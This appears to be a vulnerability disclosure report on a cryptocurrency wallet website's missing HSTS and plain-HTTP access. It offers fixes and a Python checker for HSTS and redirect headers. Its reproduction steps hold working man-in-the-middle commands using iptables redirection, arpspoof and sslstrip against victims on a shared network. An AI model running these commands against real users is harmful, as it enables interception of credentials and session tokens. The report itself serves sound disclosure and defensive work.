Vulnerability: Application Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the application is vulnerable to a MiTM (Man in the Middle) attack. An attacker positioned between the victim's browser and the site (for example via ARP spoofing on a shared network segment) can intercept the connection and, using SSLStrip, keep the victim's session on plain HTTP instead of HTTPS. This works because the site is reachable over plain HTTP (see screenshot) and the browser holds no HSTS policy that would make it refuse the HTTP connection.
Vulnerable Application: Wallet Webserver https://www.myfusionwallet.com/
Severity: High
Steps to Reproduce (run as root on a Linux host on the same network segment as the victim):
1- Redirect intercepted port-80 traffic to the port SSLStrip will listen on: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Enable IP forwarding so the victim's traffic still reaches the gateway: echo 1 > /proc/sys/net/ipv4/ip_forward
3- ARP-spoof the victim so its traffic to the gateway passes through the attacker's host (replace the placeholders with the victim's and the gateway's IP addresses): arpspoof -i eth0 -t <victim-ip> <gateway-ip>
4- Leave arpspoof running and, in a separate terminal window, start SSLStrip on the redirect port: sslstrip -l 8080
5- When the victim browses to myfusionwallet.com, the site loads over HTTP and every request and response passes through the attacker's host in cleartext.
Alternatively, confirm the weakness without a live attack: fetch the site over HTTPS and check the response headers for a Strict-Transport-Security (HSTS) header. If it is missing, nothing stops the browser from following a plain-HTTP link or redirect to the site on a later visit.
Impact: An attacker on the victim's network path can keep the victim's session with the application on HTTP. Once the session is over HTTP, the attacker can read and modify everything the browser exchanges with the wallet site, including any credentials or session tokens it sends.
Screenshot: Shows application is accessible over HTTP
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
1- Enable HSTS: send a Strict-Transport-Security header with a long max-age on every HTTPS response (browsers ignore the header on HTTP responses), and consider includeSubDomains and preload-list submission so that even a first visit cannot be downgraded.
2- Enable HTTPS throughout the website and redirect every plain-HTTP request to its HTTPS equivalent.
Attack Reference (background on SSLStrip): https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
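The header check in the reproduction steps and the two fixes above can be turned into a repeatable test. The following is an added example, not code from the original report or from the wallet site: it parses raw HTTP responses and reports the conditions that let SSLStrip succeed (content served on port 80 instead of a redirect, no HSTS header, a short max-age, no includeSubDomains, no preload). The sample responses are constructed, the hostname wallet.example in them is a placeholder, and the optional probe() helper fetches real responses over the network only when invoked explicitly.

```python
"""Added example (not part of the original report or the site's code):
check whether a site's responses leave it open to an SSLStrip-style
downgrade. The raw responses below are constructed samples; probe()
fetches real ones over the network and is only run when invoked."""
import http.client

ONE_YEAR = 31536000  # seconds; the minimum max-age accepted for HSTS preload


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, {lower-name: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def parse_hsts(value):
    """Parse 'max-age=N; includeSubDomains; preload' into a directive dict."""
    directives = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            directives[name.lower()] = val.strip().strip('"')
    return directives


def assess_https_response(raw):
    """Finding codes for the response the site sends over https://."""
    _, headers, _ = parse_response(raw)
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        # Without HSTS the browser has no reason to refuse http:// later.
        return ["NO_HSTS"]
    directives = parse_hsts(hsts)
    try:
        max_age = int(directives.get("max-age", "0"))
    except ValueError:
        max_age = 0
    findings = []
    if max_age < ONE_YEAR:
        findings.append("HSTS_MAX_AGE_SHORT")   # policy expires too soon
    if "includesubdomains" not in directives:
        findings.append("HSTS_NO_SUBDOMAINS")   # a plain-HTTP subdomain can still leak cookies
    if "preload" not in directives:
        findings.append("HSTS_NOT_PRELOAD")     # the very first visit is still strippable
    return findings


def assess_http_response(raw):
    """Finding codes for the response the site sends over plain http:// (port 80)."""
    status, headers, _ = parse_response(raw)
    location = headers.get("location", "").lower()
    if status in (301, 302, 307, 308) and location.startswith("https://"):
        return []
    # Serving content on port 80 is what the screenshot in the report shows.
    return ["HTTP_NOT_REDIRECTED"]


# Constructed samples: what an unprotected site looks like ...
VULNERABLE_HTTP = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n"
                   "<html>wallet login</html>")
VULNERABLE_HTTPS = VULNERABLE_HTTP  # same page over TLS, still no HSTS header
# ... and what the recommended fix looks like (wallet.example is a placeholder host).
HARDENED_HTTP = ("HTTP/1.1 301 Moved Permanently\r\n"
                 "Location: https://wallet.example/\r\nContent-Length: 0\r\n\r\n")
HARDENED_HTTPS = ("HTTP/1.1 200 OK\r\n"
                  "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n"
                  "Content-Type: text/html\r\n\r\n<html>wallet login</html>")


def probe(host):
    """Fetch / over ports 80 and 443 of a real host and assess both (uses the network)."""
    results = {}
    for scheme, cls, assess in (("http", http.client.HTTPConnection, assess_http_response),
                                ("https", http.client.HTTPSConnection, assess_https_response)):
        conn = cls(host, timeout=10)
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        raw = "HTTP/1.1 %d %s\r\n" % (resp.status, resp.reason)
        raw += "".join("%s: %s\r\n" % hv for hv in resp.getheaders())
        raw += "\r\n" + resp.read().decode("utf-8", "replace")
        results[scheme] = assess(raw)
        conn.close()
    return results


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        print("vulnerable:", assess_http_response(VULNERABLE_HTTP), assess_https_response(VULNERABLE_HTTPS))
        print("hardened:  ", assess_http_response(HARDENED_HTTP), assess_https_response(HARDENED_HTTPS))
```

Run it with a hostname argument to probe a live site, or with no arguments to see the constructed vulnerable and hardened responses assessed side by side. Two caveats the checks encode: the HSTS header only counts when it arrives on an HTTPS response, so a redirect on port 80 is necessary but not sufficient; and until the domain is on the browser preload list, a victim who has never visited the site over HTTPS has no policy cached, so that first request can still be stripped.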